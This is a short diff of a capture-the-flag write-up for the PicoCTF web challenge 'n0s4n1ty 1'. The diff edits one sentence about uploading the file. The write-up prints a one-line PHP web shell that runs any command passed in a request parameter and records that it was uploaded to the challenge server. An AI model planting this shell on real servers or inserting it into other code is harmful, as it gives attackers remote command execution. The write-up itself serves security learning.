aunizlkfl/CTF-Writeup/PicoCTF/Web/n0s4n1ty 1/n0s4n1ty 1.md

 ```php
 <?php system($_REQUEST['cmd']); ?>
 ```
-Saved it as `upload.php` and uploaded it successfully.
+Saved it as `upload.php` or any name you want and uploaded it successfully.

 📸 Screenshot: